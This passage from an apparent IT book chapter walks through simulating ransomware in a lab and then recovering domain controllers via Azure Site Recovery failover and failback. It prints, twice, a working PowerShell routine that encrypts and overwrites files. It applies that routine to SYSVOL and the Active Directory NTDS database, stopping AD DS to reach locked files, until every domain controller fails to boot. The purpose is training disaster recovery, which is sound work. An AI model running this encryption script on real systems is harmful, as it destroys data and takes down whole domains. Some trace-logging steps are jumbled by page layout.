[Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) }
Catch { Write-Error "Unable to open input file for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)

$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force
}

9. Try encrypting your files:

foreach ($file in $FilesToEncrypt)
{
Write-Host "Encrypting $file"
Encrypt-File $file $Cert -ErrorAction SilentlyContinue
}

10. Verify that the files are indeed encrypted.

11. Test GPUpdate from a client for interesting results. Here is before.

12. Here is after the Sysvol was encrypted.

13. We had a scenario like this at one client and didn't have a good backup of the Domain Controller. We were able to use DCGPOFix.exe to overwrite the Default Domain and Default Domain Controllers policies to start over.

14. Next, we replicated Active Directory to push our encrypted files out to all domain controllers.

15. Verified on DC02 that the Sysvol was encrypted.


Taking Down Production: Killing Domain Controllers with Ransomware

In this scenario, we are going to target the Active Directory database files, which are by default located in C:\Windows\NTDS. We will use the steps performed below to take down all of the Domain Controllers in our lab, leaving us no choice but to restore from backup or fail over to a DR site like Azure.

Encrypting the Active Directory Database

Instructions / Screenshot (if applicable)

1. Logon to DC01 as Administrator.

2. Open PowerShell ISE and run as Administrator, then run:

Add-Type -AssemblyName System.Windows.Forms
$FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog
[void]$FolderBrowser.ShowDialog()
$FolderBrowser.SelectedPath

3. Browse to C:\windows\NTDS and click OK.

4. Create a new Self Signed Certificate:

New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local

5. Copy the thumbprint to the clipboard.

6. Run the following to put the Certificate into the $Cert Variable:

$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C89DA4DBCD)
$Cert

7. Then grab the files from the folder:

$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} -ErrorAction SilentlyContinue


$FilestoEncrypt

8. Run the Encrypt-File Function:

Function Encrypt-File
{
Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
[Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography") }
Catch { Write-Error "Could not load required assembly."; Return }

$AesProvider = New-Object System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey = $KeyEncrypted.Length
$LenKey = [System.BitConverter]::GetBytes($LKey)
[Int]$LIV = $AesProvider.IV.Length
$LenIV = [System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file for writing."; Return }
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform = $AesProvider.CreateEncryptor()
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) }
Catch { Write-Error "Unable to open input file for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)

$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force
}

9. Try encrypting your files:

foreach ($file in $FilesToEncrypt)
{
Write-Host "Encrypting $file"
Encrypt-File $file $Cert -ErrorAction SilentlyContinue
}


10. Let's see if it worked. Try opening Active Directory Users and Computers. It appears to be still working: while the directory service is running it holds the database files open, so the script cannot open them for reading and skips them.

11. Stop the Active Directory Domain Services service.

12. Try encrypting the C:\Windows\NTDS folder again.

13. Now try to restart the Active Directory Domain Services service.

14. We can see that the service won't start, with a weird error 0xc0000001: 0xc0000001.

15. We can see that Active Directory Users and Computers is not operational.

16. Repeat the steps on DC02.

17. Both DCs are dead; we should try rebooting, right? Sure, why not.

18. We now have all of our DCs in a non-bootable state with Blue Screens.

19. The attack has succeeded, and all domain controllers are dead.


Survival Mode: Recovering to Azure

Remember, we talked about a narrow window to recover to Azure. If you outrun your recovery points, all of your data in the cloud will be encrypted as well. What is required at this point, at a minimum, is to plan to proceed and execute quickly with a cloud recovery strategy.

As you can see from the screenshot above, our replication is still running to Azure. Azure Site Recovery doesn't understand that anything bad has happened. Soon enough all of our DCs in our Recovery Vault will also have rolling blue screens.

Tick Tock, time to make a decision: We are Recovering to Azure

Ok, so the decision has been made; we have been asked to proceed with Azure-based recovery. We had created a Recovery Plan in Azure Site Recovery, but Recovery Plans can only be used to fail over to the last Recovery Point.

This will not work for us in this situation.


Performing the Double Swing Recovery

The double swing migration method is extremely useful in situations like this. We will first fail the Virtual Machines over to our Azure tenant, validate that everything is ok, and then bring them back on-prem to save the day.

Instructions / Screenshot (if applicable)

1. Logon to your Azure Tenant and browse to your recovery vault.

2. Click on Replicated items.

3. Click on DC01 and click Failover.

4. After we have validated the Virtual Machines, we need to Commit them to Azure.

5. Now we will use a Planned Failover to move the Virtual Machines back on-prem.

6. On the planned failover window, validate the options and click OK.

7. Repeat the steps on DC02 and wait approximately 45 minutes. In the meantime, we will have a look at a few things.

8. You can see the status of the Planned Failover.

9. Viewing the job status in Hyper-V Manager.

10. You can view the progress of the replication by checking cbengine.exe in Resource Monitor.

11. We can also enable debug logman create trace ASRDebug -v mmddhhmm -o
C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -
logging to see what is y
logman update ASRDebug -p "Microsoft-Azure Site
happening. Recovery-Provider" 0x8000000000000000 0x5
logman update ASRDebug -p
"MicrosoftAzureRecoveryServices" 0xC000000000000000
0x5

logman start ASRDebug

logman stop ASRDebug

netsh trace convert C:\temp\asr_04132122.etl

183
Chapter 7 Recovering from Ransomware using Azure Site Recovery

12. After a while, you can see


the planned failover
succeeded we have to hit
Complete Failover

13. Hit Complete Failover

184
Chapter 7 Recovering from Ransomware using Azure Site Recovery

14. You can view the status of


the replication in Hyper-V
Manager

15. You can see the progress


in Azure with the Failback

16. We can see the Domain


Controllers back online
now.

17. The real test is to see if


Active Directory is
working now.

185
Chapter 7 Recovering from Ransomware using Azure Site Recovery

18. We can also see that our


Sysvol is now fixed.
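The trace commands from step 11, rolled into one script as an added example (this is not the book's own code): it creates the same ETW session, then locates the timestamped .etl file that -v mmddhhmm produces instead of relying on a hard-coded name, converts it, and pulls out the error lines. Assumed: an elevated PowerShell session on the Hyper-V host running the ASR provider; $TraceName, $TraceDir and the Invoke-Logman helper are names chosen for this example.

```powershell
# Added example, not from the book. Wraps the chapter's logman/netsh steps with
# error checking and discovers the versioned trace file before converting it.
$TraceName = 'ASRDebug'   # example name, same as the book's session name
$TraceDir  = 'C:\temp'    # example directory, same as the book's

function Invoke-Logman {
    # Run one logman command and stop the script if it fails (logman sets $LASTEXITCODE).
    param([string[]]$Arguments)
    & logman.exe @Arguments
    if ($LASTEXITCODE -ne 0) {
        throw "logman $($Arguments -join ' ') failed with exit code $LASTEXITCODE"
    }
}

New-Item -ItemType Directory -Path $TraceDir -Force | Out-Null

# Same session settings as the book: timestamped file name, hourly file rotation,
# 10 to 250 buffers of 16 KB, overwrite existing files, no confirmation prompt.
Invoke-Logman @('create', 'trace', $TraceName, '-v', 'mmddhhmm', '-o', "$TraceDir\asr.etl",
                '-cnf', '01:00:00', '-nb', '10', '250', '-bs', '16', '-ow', '-y')
Invoke-Logman @('update', $TraceName, '-p', 'Microsoft-Azure Site Recovery-Provider',
                '0x8000000000000000', '0x5')
Invoke-Logman @('update', $TraceName, '-p', 'MicrosoftAzureRecoveryServices',
                '0xC000000000000000', '0x5')

Invoke-Logman @('start', $TraceName)
Read-Host "Tracing $TraceName. Reproduce the replication activity, then press Enter to stop" | Out-Null
Invoke-Logman @('stop', $TraceName)
Invoke-Logman @('delete', $TraceName)   # remove the collector so a later run can recreate it

# -v mmddhhmm appends a timestamp, so pick the newest asr_*.etl rather than guessing its name.
$Etl = Get-ChildItem -Path $TraceDir -Filter 'asr_*.etl' |
       Sort-Object LastWriteTime -Descending | Select-Object -First 1
if (-not $Etl) { throw "No asr_*.etl file found in $TraceDir" }

# Decode the binary trace to text next to it, then surface the lines a responder reads first.
$Txt = [System.IO.Path]::ChangeExtension($Etl.FullName, '.txt')
& netsh.exe trace convert "input=$($Etl.FullName)" "output=$Txt"
Select-String -Path $Txt -Pattern 'error|fail|exception' | Select-Object -First 50
```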


Chapter 8

Disaster Recovery items left forgotten

Chapter 9

Join us at MVPDays and meet great MVP’s like this in person
If you liked their book, you would love to hear them in person.

Live Presentations
Dave frequently speaks at Microsoft conferences around North America, such as TechEd,
VeeamOn, TechDays, and MVPDays Community Roadshow.

Cristal runs the MVPDays Community Roadshow.

You can find additional information on the following blog:

www.checkyourlogs.net

www.mvpdays.com

Video Training
For video-based training, see the following site:

www.mvpdays.com


Live Instructor-led Classes

Dave has been a Microsoft Certified Trainer (MCT) for more than 15 years and presents
scheduled instructor-led classes in the US and Canada. For current dates and locations, see the
following sites:

- www.truesec.com

- www.checkyourlogs.net

Consulting Services
Dave and Cristal have worked with some of the largest companies in the world and have a wealth
of experience and expertise. Customer engagements are typically between two weeks and six
months.

